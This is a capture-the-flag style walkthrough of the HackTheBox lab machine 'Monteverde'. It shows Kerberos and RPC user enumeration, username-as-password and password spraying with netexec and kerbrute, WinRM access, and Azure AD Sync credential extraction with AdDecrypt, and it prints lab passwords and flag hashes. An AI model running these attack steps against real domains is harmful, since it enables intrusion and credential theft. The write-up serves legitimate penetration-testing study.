Monteverde
Medium Windows Active Directory box on HackTheBox

Reconniassance
We will start off by performing a Service and Version scan on all 65535 TCP ports using nmap
nmap --privileged -p- --open -Pn -n --min-rate 5000 -sS -sCV -oN scan 10.10.10.172
Nmap scan report for 10.10.10.172
Host is up (0.042s latency).
Not shown: 65517 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-03 12:12:42Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49675/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49676/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49698/tcp open msrpc Microsoft Windows RPC
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-08-03T12:13:31
|_ start_date: N/A
|_clock-skew: -1s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug 3 13:14:12 2025 -- 1 IP address (1 host up) scanned in 122.19 seconds
As we can see we're probably facing a DC (Domain Controller) because all of the simultaneously open ports: TCP Port 88 (Kerberos)
| TCP Port 135 (RPC)
| TCP Port 5985 (WinRM)
...
We can also enumerate the Domain Name
which is MEGABANK.LOCAL
so we'll add it to our /etc/hosts
We already know that methodology is the most important on Pentesting
so let's enumerate everything, starting off by TCP Port 53 (DNS)
and check if any record contains useful information using dig
dig @10.10.10.172 MEGABANK.LOCAL NS
...
dig @10.10.10.172 MEGABANK.LOCAL MX
...
dig @10.10.10.172 MEGABANK.LOCAL TXT
...
dig @10.10.10.172 MEGABANK.LOCAL AXFR
...
But we don't seem to find anything useful here, so let's move on onto TCP Port 88 (Kerberos)
using the Kerbrute tool to try and find possible users:
kerbrute userenum --dc 10.10.10.172 -d MEGABANK.LOCAL /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 08/03/25 - Ronnie Flathers @ropnop
2025/08/03 14:44:12 > Using KDC(s):
2025/08/03 14:44:12 > 10.10.10.172:88
2025/08/03 14:44:20 > [+] VALID USERNAME: administrator@MEGABANK.LOCAL
And we found the administrator user, let's now enumerate TCP Port 135 (RPC) with a NULL session using rpcclient
rpcclient -U '' -N 10.10.10.172
rpcclient $> enumdomusers
user:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]
rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Azure Admins] rid:[0xa29]
group:[File Server Admins] rid:[0xa2e]
group:[Call Recording Admins] rid:[0xa2f]
group:[Reception] rid:[0xa30]
group:[Operations] rid:[0xa31]
group:[Trading] rid:[0xa32]
group:[HelpDesk] rid:[0xa33]
group:[Developers] rid:[0xa34]
rpcclient $> querydispinfo
index: 0xfb6 RID: 0x450 acb: 0x00000210 Account: AAD_987d7f2f57d2 Name: AAD_987d7f2f57d2 Desc: Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
index: 0xfd0 RID: 0xa35 acb: 0x00000210 Account: dgalanos Name: Dimitris Galanos Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xfc3 RID: 0x641 acb: 0x00000210 Account: mhope Name: Mike Hope Desc: (null)
index: 0xfd1 RID: 0xa36 acb: 0x00000210 Account: roleary Name: Ray O'Leary Desc: (null)
index: 0xfc5 RID: 0xa2a acb: 0x00000210 Account: SABatchJobs Name: SABatchJobs Desc: (null)
index: 0xfd2 RID: 0xa37 acb: 0x00000210 Account: smorgan Name: Sally Morgan Desc: (null)
index: 0xfc6 RID: 0xa2b acb: 0x00000210 Account: svc-ata Name: svc-ata Desc: (null)
index: 0xfc7 RID: 0xa2c acb: 0x00000210 Account: svc-bexec Name: svc-bexec Desc: (null)
index: 0xfc8 RID: 0xa2d acb: 0x00000210 Account: svc-netapp Name: svc-netapp Desc: (null)
rpcclient $>
We found a list of valid users which we copied into a users.txt
file
As we already found valid users, let's try to perform a AS-REP Roast attack
AS-REP Roasting targets Kerberos accounts with pre-authentication disabled.
Normally, users have to prove who they are before the domain gives them a ticket. But if pre-auth is off, the server sends back a Kerberos response encrypted with the user's hash — no password needed.
We can grab that response and crack it offline to get the user's password.
And you may ask, well how do I know when to do it?
We already found valid usernames. Now we’re checking if any of them are misconfigured and can give us the Kerberos hashes, so let's try to perform the attack using impacket-GetNPUsers
impacket-GetNPUsers MEGABANK.LOCAL/ -no-pass -usersfile users.txt -format john
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User AAD_987d7f2f57d2 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mhope doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User SABatchJobs doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc-ata doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc-bexec doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc-netapp doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User dgalanos doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User roleary doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User smorgan doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] invalid principal syntax
But it doesn't seem to work, so let's move on into TCP Port 445 (SMB)
using Netexec
(Newer versrion of CrackMapExec) as LDAP
will not show any useful information either.
❯ netexec smb 10.10.10.172 -u '' -p '' --shares
SMB 10.10.10.172 445 MONTEVERDE [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\:
SMB 10.10.10.172 445 MONTEVERDE [-] Error enumerating shares: STATUS_ACCESS_DENIED
❯ netexec smb 10.10.10.172 -u '' -p '' --users
SMB 10.10.10.172 445 MONTEVERDE [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\:
SMB 10.10.10.172 445 MONTEVERDE -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.10.172 445 MONTEVERDE Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.10.10.172 445 MONTEVERDE AAD_987d7f2f57d2 2020-01-02 22:53:24 0 Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
SMB 10.10.10.172 445 MONTEVERDE mhope 2020-01-02 23:40:05 0
SMB 10.10.10.172 445 MONTEVERDE SABatchJobs 2020-01-03 12:48:46 0
SMB 10.10.10.172 445 MONTEVERDE svc-ata 2020-01-03 12:58:31 0
SMB 10.10.10.172 445 MONTEVERDE svc-bexec 2020-01-03 12:59:55 0
SMB 10.10.10.172 445 MONTEVERDE svc-netapp 2020-01-03 13:01:42 0
SMB 10.10.10.172 445 MONTEVERDE dgalanos 2020-01-03 13:06:10 0
SMB 10.10.10.172 445 MONTEVERDE roleary 2020-01-03 13:08:05 0
SMB 10.10.10.172 445 MONTEVERDE smorgan 2020-01-03 13:09:21 0
SMB 10.10.10.172 445 MONTEVERDE [*] Enumerated 10 local users: MEGABANK
Users as passwords
But we find nothing new that we already enumerated, so let's try and see if any user is using their username as their password which is something I recommend that can even happen in real pentests.
netexec smb 10.10.10.172 -u users.txt -p users.txt --shares
---------------- SNIP -----------------
SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs
SMB 10.10.10.172 445 MONTEVERDE [*] Enumerated shares
SMB 10.10.10.172 445 MONTEVERDE Share Permissions Remark
SMB 10.10.10.172 445 MONTEVERDE ----- ----------- ------
SMB 10.10.10.172 445 MONTEVERDE ADMIN$ Remote Admin
SMB 10.10.10.172 445 MONTEVERDE azure_uploads READ
SMB 10.10.10.172 445 MONTEVERDE C$ Default share
SMB 10.10.10.172 445 MONTEVERDE E$ Default share
SMB 10.10.10.172 445 MONTEVERDE IPC$ READ Remote IPC
SMB 10.10.10.172 445 MONTEVERDE NETLOGON READ Logon server share
SMB 10.10.10.172 445 MONTEVERDE SYSVOL READ Logon server share
SMB 10.10.10.172 445 MONTEVERDE users$ READ
And success! We find that the user SABatchJobs
is using SABatchJobs
as the password for the account, we will enumerate all the readable shares using smbclient in order to extract more information.
smbclient -U 'SABatchJobs' //10.10.10.172/users$
smb: \> cd mhope
smb: \mhope\> ls
. D 0 Fri Jan 3 13:41:18 2020
.. D 0 Fri Jan 3 13:41:18 2020
azure.xml AR 1212 Fri Jan 3 13:40:23 2020
-------- SNIP ----------
And we found that the \mhope\ shared folder contains a file called azure.xml which contains the following content:
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
<T>System.Object</T>
</TN>
<ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
<Props>
<DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
<DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
<G N="KeyId">00000000-0000-0000-0000-000000000000</G>
<S N="Password">4n0therD4y@n0th3r$</S>
</Props>
</Obj>
</Objs>
Password Spraying
We notice a cleartext password — 4n0therD4y@n0th3r$
so let's perform a password spray attack using kerbrute
kerbrute passwordspray -d MEGABANK.LOCAL --dc 10.10.10.172 users.txt '4n0therD4y@n0th3r$'
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 08/03/25 - Ronnie Flathers @ropnop
2025/08/03 14:59:57 > Using KDC(s):
2025/08/03 14:59:57 > 10.10.10.172:88
2025/08/03 14:59:57 > [+] VALID LOGIN: mhope@MEGABANK.LOCAL:4n0therD4y@n0th3r$
2025/08/03 14:59:57 > Done! Tested 11 logins (1 successes) in 0.140 seconds
And we can see the password is valid for the user mhope
Using Netexec
we noticed that this user has the WinRM connection available:
netexec winrm 10.10.10.172 -u 'mhope' -p '4n0therD4y@n0th3r$'
WINRM 10.10.10.172 5985 MONTEVERDE [*] Windows 10 / Server 2019 Build 17763 (name:MONTEVERDE) (domain:MEGABANK.LOCAL)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.10.10.172 5985 MONTEVERDE [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$ (Pwn3d!)
Therefore, we can authenticate into the system using Evil-WinRM
evil-winrm -i 10.10.10.172 -u 'mhope' -p 4n0therD4y@n0th3r$
Privilege Escalation
With a bit of enumeration using whoami /all we notice some useful information:
*Evil-WinRM* PS C:\Users\mhope\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
============== ============================================
megabank\mhope S-1-5-21-391775091-850290835-3566037492-1601
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============================================ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
MEGABANK\Azure Admins Group S-1-5-21-391775091-850290835-3566037492-2601 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
It seems that we are onto the Azure Admins group, as this AD is running on Azure, let's move onto the C:\Program Files\
directory to enumerate possible privilege escalation clues:
*Evil-WinRM* PS C:\Program Files> dir
Directory: C:\Program Files
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/2/2020 9:36 PM Common Files
d----- 1/2/2020 2:46 PM internet explorer
d----- 1/2/2020 2:38 PM Microsoft Analysis Services
d----- 1/2/2020 2:51 PM Microsoft Azure Active Directory Connect
d----- 1/2/2020 3:37 PM Microsoft Azure Active Directory Connect Upgrader
d----- 1/2/2020 3:02 PM Microsoft Azure AD Connect Health Sync Agent
d----- 1/2/2020 2:53 PM Microsoft Azure AD Sync
------------ SNIP -----------
Microsoft Azure AD Sync Abuse
After researching on Microsoft Azure AD Sync
for a bit, I found an exploit that let's us see the cleartext passwords of the Domain Administrators
, which is a potential privilege escalation method
For more research on this exploit ill leave the link to it's explanation
Download AdDecrypt.zip
wget https://github.com/VbScrub/AdSyncDecrypt/releases/download/v1.0/AdDecrypt.zip
Upload it to the victim machine
*Evil-WinRM* PS C:\Temp> upload mcrypt.dll
*Evil-WinRM* PS C:\Temp> upload AdDecrypt.exe
Move to the target directory, otherwise it won't work
cd "C:\Program Files\Microsoft Azure AD Sync\Bin"
# Move to the target directory
cd "C:\Program Files\Microsoft Azure AD Sync\Bin"
# Execute the exploit
C:\Temp\AdDecrypt.exe -FullSQL
Execute the exploit and retrieve the cleartext password
*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> C:\Temp\AdDecrypt.exe -FullSQL
======================
AZURE AD SYNC CREDENTIAL DECRYPTION TOOL
Based on original code from: https://github.com/fox-it/adconnectdump
======================
Opening database connection...
Executing SQL commands...
Closing database connection...
Decrypting XML...
Parsing XML...
Finished!
DECRYPTED CREDENTIALS:
Username: administrator
Password: d0m@in4dminyeah!
Domain: MEGABANK.LOCAL
Now let's login onto the administrator
account using the d0m@in4dminyeah!
password through Evil-WinRM
and retrieve the flags!
evil-winrm -i 10.10.10.172 -u 'administrator' -p d0m@in4dminyeah!
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
b57c55ed9a0d5b2fb99ec3296b5ea216
*Evil-WinRM* PS C:\Users\Administrator\Documents> type C:\Users\mhope\Desktop\user.txt
130d0c9981e480b6dda335b9a35ae948
Overall realistic and interesting box, recommended for studying for the OSCP\eCPPTv3, thank you for reading this write-up and see you in the next time <3!!
Last updated